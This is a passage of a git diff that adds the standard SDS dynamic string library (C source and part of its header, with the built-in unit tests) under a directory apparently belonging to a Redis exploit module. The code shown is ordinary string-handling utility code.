sdsclear(sds s) { + sdssetlen(s, 0); + s[0] = '\0'; +} + +/* Enlarge the free space at the end of the sds string so that the caller + * is sure that after calling this function can overwrite up to addlen + * bytes after the end of the string, plus one more byte for nul term. + * + * Note: this does not change the *length* of the sds string as returned + * by sdslen(), but only the free buffer space we have. */ +sds sdsMakeRoomFor(sds s, size_t addlen) { + void *sh, *newsh; + size_t avail = sdsavail(s); + size_t len, newlen; + char type, oldtype = s[-1] & SDS_TYPE_MASK; + int hdrlen; + + /* Return ASAP if there is enough space left. */ + if (avail >= addlen) return s; + + len = sdslen(s); + sh = (char*)s-sdsHdrSize(oldtype); + newlen = (len+addlen); + if (newlen < SDS_MAX_PREALLOC) + newlen *= 2; + else + newlen += SDS_MAX_PREALLOC; + + type = sdsReqType(newlen); + + /* Don't use type 5: the user is appending to the string and type 5 is + * not able to remember empty space, so sdsMakeRoomFor() must be called + * at every appending operation. */ + if (type == SDS_TYPE_5) type = SDS_TYPE_8; + + hdrlen = sdsHdrSize(type); + if (oldtype==type) { + newsh = s_realloc(sh, hdrlen+newlen+1); + if (newsh == NULL) return NULL; + s = (char*)newsh+hdrlen; + } else { + /* Since the header size changes, need to move the string forward, + * and can't use realloc */ + newsh = s_malloc(hdrlen+newlen+1); + if (newsh == NULL) return NULL; + memcpy((char*)newsh+hdrlen, s, len+1); + s_free(sh); + s = (char*)newsh+hdrlen; + s[-1] = type; + sdssetlen(s, len); + } + sdssetalloc(s, newlen); + return s; +} + +/* Reallocate the sds string so that it has no free space at the end. The + * contained string remains not altered, but next concatenation operations + * will require a reallocation. + * + * After the call, the passed sds string is no longer valid and all the + * references must be substituted with the new pointer returned by the call. */ +sds sdsRemoveFreeSpace(sds s) { + void *sh, *newsh; + char type, oldtype = s[-1] & SDS_TYPE_MASK; + int hdrlen; + size_t len = sdslen(s); + sh = (char*)s-sdsHdrSize(oldtype); + + type = sdsReqType(len); + hdrlen = sdsHdrSize(type); + if (oldtype==type) { + newsh = s_realloc(sh, hdrlen+len+1); + if (newsh == NULL) return NULL; + s = (char*)newsh+hdrlen; + } else { + newsh = s_malloc(hdrlen+len+1); + if (newsh == NULL) return NULL; + memcpy((char*)newsh+hdrlen, s, len+1); + s_free(sh); + s = (char*)newsh+hdrlen; + s[-1] = type; + sdssetlen(s, len); + } + sdssetalloc(s, len); + return s; +} + +/* Return the total size of the allocation of the specifed sds string, + * including: + * 1) The sds header before the pointer. + * 2) The string. + * 3) The free buffer at the end if any. + * 4) The implicit null term. + */ +size_t sdsAllocSize(sds s) { + size_t alloc = sdsalloc(s); + return sdsHdrSize(s[-1])+alloc+1; +} + +/* Return the pointer of the actual SDS allocation (normally SDS strings + * are referenced by the start of the string buffer). */ +void *sdsAllocPtr(sds s) { + return (void*) (s-sdsHdrSize(s[-1])); +} + +/* Increment the sds length and decrements the left free space at the + * end of the string according to 'incr'. Also set the null term + * in the new end of the string. + * + * This function is used in order to fix the string length after the + * user calls sdsMakeRoomFor(), writes something after the end of + * the current string, and finally needs to set the new length. + * + * Note: it is possible to use a negative increment in order to + * right-trim the string. + * + * Usage example: + * + * Using sdsIncrLen() and sdsMakeRoomFor() it is possible to mount the + * following schema, to cat bytes coming from the kernel to the end of an + * sds string without copying into an intermediate buffer: + * + * oldlen = sdslen(s); + * s = sdsMakeRoomFor(s, BUFFER_SIZE); + * nread = read(fd, s+oldlen, BUFFER_SIZE); + * ... check for nread <= 0 and handle it ... + * sdsIncrLen(s, nread); + */ +void sdsIncrLen(sds s, int incr) { + unsigned char flags = s[-1]; + size_t len; + switch(flags&SDS_TYPE_MASK) { + case SDS_TYPE_5: { + unsigned char *fp = ((unsigned char*)s)-1; + unsigned char oldlen = SDS_TYPE_5_LEN(flags); + assert((incr > 0 && oldlen+incr < 32) || (incr < 0 && oldlen >= (unsigned int)(-incr))); + *fp = SDS_TYPE_5 | ((oldlen+incr) << SDS_TYPE_BITS); + len = oldlen+incr; + break; + } + case SDS_TYPE_8: { + SDS_HDR_VAR(8,s); + assert((incr >= 0 && sh->alloc-sh->len >= incr) || (incr < 0 && sh->len >= (unsigned int)(-incr))); + len = (sh->len += incr); + break; + } + case SDS_TYPE_16: { + SDS_HDR_VAR(16,s); + assert((incr >= 0 && sh->alloc-sh->len >= incr) || (incr < 0 && sh->len >= (unsigned int)(-incr))); + len = (sh->len += incr); + break; + } + case SDS_TYPE_32: { + SDS_HDR_VAR(32,s); + assert((incr >= 0 && sh->alloc-sh->len >= (unsigned int)incr) || (incr < 0 && sh->len >= (unsigned int)(-incr))); + len = (sh->len += incr); + break; + } + case SDS_TYPE_64: { + SDS_HDR_VAR(64,s); + assert((incr >= 0 && sh->alloc-sh->len >= (uint64_t)incr) || (incr < 0 && sh->len >= (uint64_t)(-incr))); + len = (sh->len += incr); + break; + } + default: len = 0; /* Just to avoid compilation warnings. */ + } + s[len] = '\0'; +} + +/* Grow the sds to have the specified length. Bytes that were not part of + * the original length of the sds will be set to zero. + * + * if the specified length is smaller than the current length, no operation + * is performed. */ +sds sdsgrowzero(sds s, size_t len) { + size_t curlen = sdslen(s); + + if (len <= curlen) return s; + s = sdsMakeRoomFor(s,len-curlen); + if (s == NULL) return NULL; + + /* Make sure added region doesn't contain garbage */ + memset(s+curlen,0,(len-curlen+1)); /* also set trailing \0 byte */ + sdssetlen(s, len); + return s; +} + +/* Append the specified binary-safe string pointed by 't' of 'len' bytes to the + * end of the specified sds string 's'. + * + * After the call, the passed sds string is no longer valid and all the + * references must be substituted with the new pointer returned by the call. */ +sds sdscatlen(sds s, const void *t, size_t len) { + size_t curlen = sdslen(s); + + s = sdsMakeRoomFor(s,len); + if (s == NULL) return NULL; + memcpy(s+curlen, t, len); + sdssetlen(s, curlen+len); + s[curlen+len] = '\0'; + return s; +} + +/* Append the specified null termianted C string to the sds string 's'. + * + * After the call, the passed sds string is no longer valid and all the + * references must be substituted with the new pointer returned by the call. */ +sds sdscat(sds s, const char *t) { + return sdscatlen(s, t, strlen(t)); +} + +/* Append the specified sds 't' to the existing sds 's'. + * + * After the call, the modified sds string is no longer valid and all the + * references must be substituted with the new pointer returned by the call. */ +sds sdscatsds(sds s, const sds t) { + return sdscatlen(s, t, sdslen(t)); +} + +/* Destructively modify the sds string 's' to hold the specified binary + * safe string pointed by 't' of length 'len' bytes. */ +sds sdscpylen(sds s, const char *t, size_t len) { + if (sdsalloc(s) < len) { + s = sdsMakeRoomFor(s,len-sdslen(s)); + if (s == NULL) return NULL; + } + memcpy(s, t, len); + s[len] = '\0'; + sdssetlen(s, len); + return s; +} + +/* Like sdscpylen() but 't' must be a null-termined string so that the length + * of the string is obtained with strlen(). */ +sds sdscpy(sds s, const char *t) { + return sdscpylen(s, t, strlen(t)); +} + +/* Helper for sdscatlonglong() doing the actual number -> string + * conversion. 's' must point to a string with room for at least + * SDS_LLSTR_SIZE bytes. + * + * The function returns the length of the null-terminated string + * representation stored at 's'. */ +#define SDS_LLSTR_SIZE 21 +int sdsll2str(char *s, long long value) { + char *p, aux; + unsigned long long v; + size_t l; + + /* Generate the string representation, this method produces + * an reversed string. */ + v = (value < 0) ? -value : value; + p = s; + do { + *p++ = '0'+(v%10); + v /= 10; + } while(v); + if (value < 0) *p++ = '-'; + + /* Compute length and add null term. */ + l = p-s; + *p = '\0'; + + /* Reverse the string. */ + p--; + while(s < p) { + aux = *s; + *s = *p; + *p = aux; + s++; + p--; + } + return l; +} + +/* Identical sdsll2str(), but for unsigned long long type. */ +int sdsull2str(char *s, unsigned long long v) { + char *p, aux; + size_t l; + + /* Generate the string representation, this method produces + * an reversed string. */ + p = s; + do { + *p++ = '0'+(v%10); + v /= 10; + } while(v); + + /* Compute length and add null term. */ + l = p-s; + *p = '\0'; + + /* Reverse the string. */ + p--; + while(s < p) { + aux = *s; + *s = *p; + *p = aux; + s++; + p--; + } + return l; +} + +/* Create an sds string from a long long value. It is much faster than: + * + * sdscatprintf(sdsempty(),"%lld\n", value); + */ +sds sdsfromlonglong(long long value) { + char buf[SDS_LLSTR_SIZE]; + int len = sdsll2str(buf,value); + + return sdsnewlen(buf,len); +} + +/* Like sdscatprintf() but gets va_list instead of being variadic. */ +sds sdscatvprintf(sds s, const char *fmt, va_list ap) { + va_list cpy; + char staticbuf[1024], *buf = staticbuf, *t; + size_t buflen = strlen(fmt)*2; + + /* We try to start using a static buffer for speed. + * If not possible we revert to heap allocation. */ + if (buflen > sizeof(staticbuf)) { + buf = s_malloc(buflen); + if (buf == NULL) return NULL; + } else { + buflen = sizeof(staticbuf); + } + + /* Try with buffers two times bigger every time we fail to + * fit the string in the current buffer size. */ + while(1) { + buf[buflen-2] = '\0'; + va_copy(cpy,ap); + vsnprintf(buf, buflen, fmt, cpy); + va_end(cpy); + if (buf[buflen-2] != '\0') { + if (buf != staticbuf) s_free(buf); + buflen *= 2; + buf = s_malloc(buflen); + if (buf == NULL) return NULL; + continue; + } + break; + } + + /* Finally concat the obtained string to the SDS string and return it. */ + t = sdscat(s, buf); + if (buf != staticbuf) s_free(buf); + return t; +} + +/* Append to the sds string 's' a string obtained using printf-alike format + * specifier. + * + * After the call, the modified sds string is no longer valid and all the + * references must be substituted with the new pointer returned by the call. + * + * Example: + * + * s = sdsnew("Sum is: "); + * s = sdscatprintf(s,"%d+%d = %d",a,b,a+b). + * + * Often you need to create a string from scratch with the printf-alike + * format. When this is the need, just use sdsempty() as the target string: + * + * s = sdscatprintf(sdsempty(), "... your format ...", args); + */ +sds sdscatprintf(sds s, const char *fmt, ...) { + va_list ap; + char *t; + va_start(ap, fmt); + t = sdscatvprintf(s,fmt,ap); + va_end(ap); + return t; +} + +/* This function is similar to sdscatprintf, but much faster as it does + * not rely on sprintf() family functions implemented by the libc that + * are often very slow. Moreover directly handling the sds string as + * new data is concatenated provides a performance improvement. + * + * However this function only handles an incompatible subset of printf-alike + * format specifiers: + * + * %s - C String + * %S - SDS string + * %i - signed int + * %I - 64 bit signed integer (long long, int64_t) + * %u - unsigned int + * %U - 64 bit unsigned integer (unsigned long long, uint64_t) + * %% - Verbatim "%" character. + */ +sds sdscatfmt(sds s, char const *fmt, ...) { + size_t initlen = sdslen(s); + const char *f = fmt; + int i; + va_list ap; + + va_start(ap,fmt); + f = fmt; /* Next format specifier byte to process. */ + i = initlen; /* Position of the next byte to write to dest str. */ + while(*f) { + char next, *str; + size_t l; + long long num; + unsigned long long unum; + + /* Make sure there is always space for at least 1 char. */ + if (sdsavail(s)==0) { + s = sdsMakeRoomFor(s,1); + } + + switch(*f) { + case '%': + next = *(f+1); + f++; + switch(next) { + case 's': + case 'S': + str = va_arg(ap,char*); + l = (next == 's') ? strlen(str) : sdslen(str); + if (sdsavail(s) < l) { + s = sdsMakeRoomFor(s,l); + } + memcpy(s+i,str,l); + sdsinclen(s,l); + i += l; + break; + case 'i': + case 'I': + if (next == 'i') + num = va_arg(ap,int); + else + num = va_arg(ap,long long); + { + char buf[SDS_LLSTR_SIZE]; + l = sdsll2str(buf,num); + if (sdsavail(s) < l) { + s = sdsMakeRoomFor(s,l); + } + memcpy(s+i,buf,l); + sdsinclen(s,l); + i += l; + } + break; + case 'u': + case 'U': + if (next == 'u') + unum = va_arg(ap,unsigned int); + else + unum = va_arg(ap,unsigned long long); + { + char buf[SDS_LLSTR_SIZE]; + l = sdsull2str(buf,unum); + if (sdsavail(s) < l) { + s = sdsMakeRoomFor(s,l); + } + memcpy(s+i,buf,l); + sdsinclen(s,l); + i += l; + } + break; + default: /* Handle %% and generally %. */ + s[i++] = next; + sdsinclen(s,1); + break; + } + break; + default: + s[i++] = *f; + sdsinclen(s,1); + break; + } + f++; + } + va_end(ap); + + /* Add null-term */ + s[i] = '\0'; + return s; +} + +/* Remove the part of the string from left and from right composed just of + * contiguous characters found in 'cset', that is a null terminted C string. + * + * After the call, the modified sds string is no longer valid and all the + * references must be substituted with the new pointer returned by the call. + * + * Example: + * + * s = sdsnew("AA...AA.a.aa.aHelloWorld :::"); + * s = sdstrim(s,"Aa. :"); + * printf("%s\n", s); + * + * Output will be just "Hello World". + */ +sds sdstrim(sds s, const char *cset) { + char *start, *end, *sp, *ep; + size_t len; + + sp = start = s; + ep = end = s+sdslen(s)-1; + while(sp <= end && strchr(cset, *sp)) sp++; + while(ep > sp && strchr(cset, *ep)) ep--; + len = (sp > ep) ? 0 : ((ep-sp)+1); + if (s != sp) memmove(s, sp, len); + s[len] = '\0'; + sdssetlen(s,len); + return s; +} + +/* Turn the string into a smaller (or equal) string containing only the + * substring specified by the 'start' and 'end' indexes. + * + * start and end can be negative, where -1 means the last character of the + * string, -2 the penultimate character, and so forth. + * + * The interval is inclusive, so the start and end characters will be part + * of the resulting string. + * + * The string is modified in-place. + * + * Example: + * + * s = sdsnew("Hello World"); + * sdsrange(s,1,-1); => "ello World" + */ +void sdsrange(sds s, int start, int end) { + size_t newlen, len = sdslen(s); + + if (len == 0) return; + if (start < 0) { + start = len+start; + if (start < 0) start = 0; + } + if (end < 0) { + end = len+end; + if (end < 0) end = 0; + } + newlen = (start > end) ? 0 : (end-start)+1; + if (newlen != 0) { + if (start >= (signed)len) { + newlen = 0; + } else if (end >= (signed)len) { + end = len-1; + newlen = (start > end) ? 0 : (end-start)+1; + } + } else { + start = 0; + } + if (start && newlen) memmove(s, s+start, newlen); + s[newlen] = 0; + sdssetlen(s,newlen); +} + +/* Apply tolower() to every character of the sds string 's'. */ +void sdstolower(sds s) { + int len = sdslen(s), j; + + for (j = 0; j < len; j++) s[j] = tolower(s[j]); +} + +/* Apply toupper() to every character of the sds string 's'. */ +void sdstoupper(sds s) { + int len = sdslen(s), j; + + for (j = 0; j < len; j++) s[j] = toupper(s[j]); +} + +/* Compare two sds strings s1 and s2 with memcmp(). + * + * Return value: + * + * positive if s1 > s2. + * negative if s1 < s2. + * 0 if s1 and s2 are exactly the same binary string. + * + * If two strings share exactly the same prefix, but one of the two has + * additional characters, the longer string is considered to be greater than + * the smaller one. */ +int sdscmp(const sds s1, const sds s2) { + size_t l1, l2, minlen; + int cmp; + + l1 = sdslen(s1); + l2 = sdslen(s2); + minlen = (l1 < l2) ? l1 : l2; + cmp = memcmp(s1,s2,minlen); + if (cmp == 0) return l1-l2; + return cmp; +} + +/* Split 's' with separator in 'sep'. An array + * of sds strings is returned. *count will be set + * by reference to the number of tokens returned. + * + * On out of memory, zero length string, zero length + * separator, NULL is returned. + * + * Note that 'sep' is able to split a string using + * a multi-character separator. For example + * sdssplit("foo_-_bar","_-_"); will return two + * elements "foo" and "bar". + * + * This version of the function is binary-safe but + * requires length arguments. sdssplit() is just the + * same function but for zero-terminated strings. + */ +sds *sdssplitlen(const char *s, int len, const char *sep, int seplen, int *count) { + int elements = 0, slots = 5, start = 0, j; + sds *tokens; + + if (seplen < 1 || len < 0) return NULL; + + tokens = s_malloc(sizeof(sds)*slots); + if (tokens == NULL) return NULL; + + if (len == 0) { + *count = 0; + return tokens; + } + for (j = 0; j < (len-(seplen-1)); j++) { + /* make sure there is room for the next element and the final one */ + if (slots < elements+2) { + sds *newtokens; + + slots *= 2; + newtokens = s_realloc(tokens,sizeof(sds)*slots); + if (newtokens == NULL) goto cleanup; + tokens = newtokens; + } + /* search the separator */ + if ((seplen == 1 && *(s+j) == sep[0]) || (memcmp(s+j,sep,seplen) == 0)) { + tokens[elements] = sdsnewlen(s+start,j-start); + if (tokens[elements] == NULL) goto cleanup; + elements++; + start = j+seplen; + j = j+seplen-1; /* skip the separator */ + } + } + /* Add the final element. We are sure there is room in the tokens array. */ + tokens[elements] = sdsnewlen(s+start,len-start); + if (tokens[elements] == NULL) goto cleanup; + elements++; + *count = elements; + return tokens; + +cleanup: + { + int i; + for (i = 0; i < elements; i++) sdsfree(tokens[i]); + s_free(tokens); + *count = 0; + return NULL; + } +} + +/* Free the result returned by sdssplitlen(), or do nothing if 'tokens' is NULL. */ +void sdsfreesplitres(sds *tokens, int count) { + if (!tokens) return; + while(count--) + sdsfree(tokens[count]); + s_free(tokens); +} + +/* Append to the sds string "s" an escaped string representation where + * all the non-printable characters (tested with isprint()) are turned into + * escapes in the form "\n\r\a...." or "\x". + * + * After the call, the modified sds string is no longer valid and all the + * references must be substituted with the new pointer returned by the call. */ +sds sdscatrepr(sds s, const char *p, size_t len) { + s = sdscatlen(s,"\"",1); + while(len--) { + switch(*p) { + case '\\': + case '"': + s = sdscatprintf(s,"\\%c",*p); + break; + case '\n': s = sdscatlen(s,"\\n",2); break; + case '\r': s = sdscatlen(s,"\\r",2); break; + case '\t': s = sdscatlen(s,"\\t",2); break; + case '\a': s = sdscatlen(s,"\\a",2); break; + case '\b': s = sdscatlen(s,"\\b",2); break; + default: + if (isprint(*p)) + s = sdscatprintf(s,"%c",*p); + else + s = sdscatprintf(s,"\\x%02x",(unsigned char)*p); + break; + } + p++; + } + return sdscatlen(s,"\"",1); +} + +/* Helper function for sdssplitargs() that returns non zero if 'c' + * is a valid hex digit. */ +int is_hex_digit(char c) { + return (c >= '0' && c <= '9') || (c >= 'a' && c <= 'f') || + (c >= 'A' && c <= 'F'); +} + +/* Helper function for sdssplitargs() that converts a hex digit into an + * integer from 0 to 15 */ +int hex_digit_to_int(char c) { + switch(c) { + case '0': return 0; + case '1': return 1; + case '2': return 2; + case '3': return 3; + case '4': return 4; + case '5': return 5; + case '6': return 6; + case '7': return 7; + case '8': return 8; + case '9': return 9; + case 'a': case 'A': return 10; + case 'b': case 'B': return 11; + case 'c': case 'C': return 12; + case 'd': case 'D': return 13; + case 'e': case 'E': return 14; + case 'f': case 'F': return 15; + default: return 0; + } +} + +/* Split a line into arguments, where every argument can be in the + * following programming-language REPL-alike form: + * + * foo bar "newline are supported\n" and "\xff\x00otherstuff" + * + * The number of arguments is stored into *argc, and an array + * of sds is returned. + * + * The caller should free the resulting array of sds strings with + * sdsfreesplitres(). + * + * Note that sdscatrepr() is able to convert back a string into + * a quoted string in the same format sdssplitargs() is able to parse. + * + * The function returns the allocated tokens on success, even when the + * input string is empty, or NULL if the input contains unbalanced + * quotes or closed quotes followed by non space characters + * as in: "foo"bar or "foo' + */ +sds *sdssplitargs(const char *line, int *argc) { + const char *p = line; + char *current = NULL; + char **vector = NULL; + + *argc = 0; + while(1) { + /* skip blanks */ + while(*p && isspace(*p)) p++; + if (*p) { + /* get a token */ + int inq=0; /* set to 1 if we are in "quotes" */ + int insq=0; /* set to 1 if we are in 'single quotes' */ + int done=0; + + if (current == NULL) current = sdsempty(); + while(!done) { + if (inq) { + if (*p == '\\' && *(p+1) == 'x' && + is_hex_digit(*(p+2)) && + is_hex_digit(*(p+3))) + { + unsigned char byte; + + byte = (hex_digit_to_int(*(p+2))*16)+ + hex_digit_to_int(*(p+3)); + current = sdscatlen(current,(char*)&byte,1); + p += 3; + } else if (*p == '\\' && *(p+1)) { + char c; + + p++; + switch(*p) { + case 'n': c = '\n'; break; + case 'r': c = '\r'; break; + case 't': c = '\t'; break; + case 'b': c = '\b'; break; + case 'a': c = '\a'; break; + default: c = *p; break; + } + current = sdscatlen(current,&c,1); + } else if (*p == '"') { + /* closing quote must be followed by a space or + * nothing at all. */ + if (*(p+1) && !isspace(*(p+1))) goto err; + done=1; + } else if (!*p) { + /* unterminated quotes */ + goto err; + } else { + current = sdscatlen(current,p,1); + } + } else if (insq) { + if (*p == '\\' && *(p+1) == '\'') { + p++; + current = sdscatlen(current,"'",1); + } else if (*p == '\'') { + /* closing quote must be followed by a space or + * nothing at all. */ + if (*(p+1) && !isspace(*(p+1))) goto err; + done=1; + } else if (!*p) { + /* unterminated quotes */ + goto err; + } else { + current = sdscatlen(current,p,1); + } + } else { + switch(*p) { + case ' ': + case '\n': + case '\r': + case '\t': + case '\0': + done=1; + break; + case '"': + inq=1; + break; + case '\'': + insq=1; + break; + default: + current = sdscatlen(current,p,1); + break; + } + } + if (*p) p++; + } + /* add the token to the vector */ + vector = s_realloc(vector,((*argc)+1)*sizeof(char*)); + vector[*argc] = current; + (*argc)++; + current = NULL; + } else { + /* Even on empty input string return something not NULL. */ + if (vector == NULL) vector = s_malloc(sizeof(void*)); + return vector; + } + } + +err: + while((*argc)--) + sdsfree(vector[*argc]); + s_free(vector); + if (current) sdsfree(current); + *argc = 0; + return NULL; +} + +/* Modify the string substituting all the occurrences of the set of + * characters specified in the 'from' string to the corresponding character + * in the 'to' array. + * + * For instance: sdsmapchars(mystring, "ho", "01", 2) + * will have the effect of turning the string "hello" into "0ell1". + * + * The function returns the sds string pointer, that is always the same + * as the input pointer since no resize is needed. */ +sds sdsmapchars(sds s, const char *from, const char *to, size_t setlen) { + size_t j, i, l = sdslen(s); + + for (j = 0; j < l; j++) { + for (i = 0; i < setlen; i++) { + if (s[j] == from[i]) { + s[j] = to[i]; + break; + } + } + } + return s; +} + +/* Join an array of C strings using the specified separator (also a C string). + * Returns the result as an sds string. */ +sds sdsjoin(char **argv, int argc, char *sep) { + sds join = sdsempty(); + int j; + + for (j = 0; j < argc; j++) { + join = sdscat(join, argv[j]); + if (j != argc-1) join = sdscat(join,sep); + } + return join; +} + +/* Like sdsjoin, but joins an array of SDS strings. */ +sds sdsjoinsds(sds *argv, int argc, const char *sep, size_t seplen) { + sds join = sdsempty(); + int j; + + for (j = 0; j < argc; j++) { + join = sdscatsds(join, argv[j]); + if (j != argc-1) join = sdscatlen(join,sep,seplen); + } + return join; +} + +/* Wrappers to the allocators used by SDS. Note that SDS will actually + * just use the macros defined into sdsalloc.h in order to avoid to pay + * the overhead of function calls. Here we define these wrappers only for + * the programs SDS is linked to, if they want to touch the SDS internals + * even if they use a different allocator. */ +void *sds_malloc(size_t size) { return s_malloc(size); } +void *sds_realloc(void *ptr, size_t size) { return s_realloc(ptr,size); } +void sds_free(void *ptr) { s_free(ptr); } + +#if defined(SDS_TEST_MAIN) +#include +#include "testhelp.h" +#include "limits.h" + +#define UNUSED(x) (void)(x) +int sdsTest(void) { + { + sds x = sdsnew("foo"), y; + + test_cond("Create a string and obtain the length", + sdslen(x) == 3 && memcmp(x,"foo\0",4) == 0) + + sdsfree(x); + x = sdsnewlen("foo",2); + test_cond("Create a string with specified length", + sdslen(x) == 2 && memcmp(x,"fo\0",3) == 0) + + x = sdscat(x,"bar"); + test_cond("Strings concatenation", + sdslen(x) == 5 && memcmp(x,"fobar\0",6) == 0); + + x = sdscpy(x,"a"); + test_cond("sdscpy() against an originally longer string", + sdslen(x) == 1 && memcmp(x,"a\0",2) == 0) + + x = sdscpy(x,"xyzxxxxxxxxxxyyyyyyyyyykkkkkkkkkk"); + test_cond("sdscpy() against an originally shorter string", + sdslen(x) == 33 && + memcmp(x,"xyzxxxxxxxxxxyyyyyyyyyykkkkkkkkkk\0",33) == 0) + + sdsfree(x); + x = sdscatprintf(sdsempty(),"%d",123); + test_cond("sdscatprintf() seems working in the base case", + sdslen(x) == 3 && memcmp(x,"123\0",4) == 0) + + sdsfree(x); + x = sdsnew("--"); + x = sdscatfmt(x, "Hello %s World %I,%I--", "Hi!", LLONG_MIN,LLONG_MAX); + test_cond("sdscatfmt() seems working in the base case", + sdslen(x) == 60 && + memcmp(x,"--Hello Hi! World -9223372036854775808," + "9223372036854775807--",60) == 0) + printf("[%s]\n",x); + + sdsfree(x); + x = sdsnew("--"); + x = sdscatfmt(x, "%u,%U--", UINT_MAX, ULLONG_MAX); + test_cond("sdscatfmt() seems working with unsigned numbers", + sdslen(x) == 35 && + memcmp(x,"--4294967295,18446744073709551615--",35) == 0) + + sdsfree(x); + x = sdsnew(" x "); + sdstrim(x," x"); + test_cond("sdstrim() works when all chars match", + sdslen(x) == 0) + + sdsfree(x); + x = sdsnew(" x "); + sdstrim(x," "); + test_cond("sdstrim() works when a single char remains", + sdslen(x) == 1 && x[0] == 'x') + + sdsfree(x); + x = sdsnew("xxciaoyyy"); + sdstrim(x,"xy"); + test_cond("sdstrim() correctly trims characters", + sdslen(x) == 4 && memcmp(x,"ciao\0",5) == 0) + + y = sdsdup(x); + sdsrange(y,1,1); + test_cond("sdsrange(...,1,1)", + sdslen(y) == 1 && memcmp(y,"i\0",2) == 0) + + sdsfree(y); + y = sdsdup(x); + sdsrange(y,1,-1); + test_cond("sdsrange(...,1,-1)", + sdslen(y) == 3 && memcmp(y,"iao\0",4) == 0) + + sdsfree(y); + y = sdsdup(x); + sdsrange(y,-2,-1); + test_cond("sdsrange(...,-2,-1)", + sdslen(y) == 2 && memcmp(y,"ao\0",3) == 0) + + sdsfree(y); + y = sdsdup(x); + sdsrange(y,2,1); + test_cond("sdsrange(...,2,1)", + sdslen(y) == 0 && memcmp(y,"\0",1) == 0) + + sdsfree(y); + y = sdsdup(x); + sdsrange(y,1,100); + test_cond("sdsrange(...,1,100)", + sdslen(y) == 3 && memcmp(y,"iao\0",4) == 0) + + sdsfree(y); + y = sdsdup(x); + sdsrange(y,100,100); + test_cond("sdsrange(...,100,100)", + sdslen(y) == 0 && memcmp(y,"\0",1) == 0) + + sdsfree(y); + sdsfree(x); + x = sdsnew("foo"); + y = sdsnew("foa"); + test_cond("sdscmp(foo,foa)", sdscmp(x,y) > 0) + + sdsfree(y); + sdsfree(x); + x = sdsnew("bar"); + y = sdsnew("bar"); + test_cond("sdscmp(bar,bar)", sdscmp(x,y) == 0) + + sdsfree(y); + sdsfree(x); + x = sdsnew("aar"); + y = sdsnew("bar"); + test_cond("sdscmp(bar,bar)", sdscmp(x,y) < 0) + + sdsfree(y); + sdsfree(x); + x = sdsnewlen("\a\n\0foo\r",7); + y = sdscatrepr(sdsempty(),x,sdslen(x)); + test_cond("sdscatrepr(...data...)", + memcmp(y,"\"\\a\\n\\x00foo\\r\"",15) == 0) + + { + unsigned int oldfree; + char *p; + int step = 10, j, i; + + sdsfree(x); + sdsfree(y); + x = sdsnew("0"); + test_cond("sdsnew() free/len buffers", sdslen(x) == 1 && sdsavail(x) == 0); + + /* Run the test a few times in order to hit the first two + * SDS header types. */ + for (i = 0; i < 10; i++) { + int oldlen = sdslen(x); + x = sdsMakeRoomFor(x,step); + int type = x[-1]&SDS_TYPE_MASK; + + test_cond("sdsMakeRoomFor() len", sdslen(x) == oldlen); + if (type != SDS_TYPE_5) { + test_cond("sdsMakeRoomFor() free", sdsavail(x) >= step); + oldfree = sdsavail(x); + } + p = x+oldlen; + for (j = 0; j < step; j++) { + p[j] = 'A'+j; + } + sdsIncrLen(x,step); + } + test_cond("sdsMakeRoomFor() content", + memcmp("0ABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJ",x,101) == 0); + test_cond("sdsMakeRoomFor() final length",sdslen(x)==101); + + sdsfree(x); + } + } + test_report() + return 0; +} +#endif + +#ifdef SDS_TEST_MAIN +int main(void) { + return sdsTest(); +} +#endif diff --git a/data/exploits/redis/rmutil/sds.h b/data/exploits/redis/rmutil/sds.h new file mode 100644 index 000000000000..394f8b52eacb --- /dev/null +++ b/data/exploits/redis/rmutil/sds.h @@ -0,0 +1,273 @@ +/* SDSLib 2.0 -- A C dynamic strings library + * + * Copyright (c) 2006-2015, Salvatore Sanfilippo + * Copyright (c) 2015, Oran Agra + * Copyright (c) 2015, Redis Labs, Inc + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * * Redistributions of source code must retain the above copyright notice, + * this list of conditions and the following disclaimer. + * * Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in the + * documentation and/or other materials provided with the distribution. + * * Neither the name of Redis nor the names of its contributors may be used + * to endorse or promote products derived from this software without + * specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE + * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN + * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + * POSSIBILITY OF SUCH DAMAGE. + */ + +#ifndef __SDS_H +#define __SDS_H + +#define SDS_MAX_PREALLOC (1024*1024) + +#include +#include +#include + +typedef char *sds; + +/* Note: sdshdr5 is never used, we just access the flags byte directly. + * However is here to document the layout of type 5 SDS strings. */ +struct __attribute__ ((__packed__)) sdshdr5 { + unsigned char flags; /* 3 lsb of type, and 5 msb of string length */ + char buf[]; +}; +struct __attribute__ ((__packed__)) sdshdr8 { + uint8_t len; /* used */ + uint8_t alloc; /* excluding the header and null terminator */ + unsigned char flags; /* 3 lsb of type, 5 unused bits */ + char buf[]; +}; +struct __attribute__ ((__packed__)) sdshdr16 { + uint16_t len; /* used */ + uint16_t alloc; /* excluding the header and null terminator */ + unsigned char flags; /* 3 lsb of type, 5 unused bits */ + char buf[]; +}; +struct __attribute__ ((__packed__)) sdshdr32 { + uint32_t len; /* used */ + uint32_t alloc; /* excluding the header and null terminator */ + unsigned char flags; /* 3 lsb of type, 5 unused bits */ + char buf[]; +}; +struct __attribute__ ((__packed__)) sdshdr64 { + uint64_t len; /* used */ + uint64_t 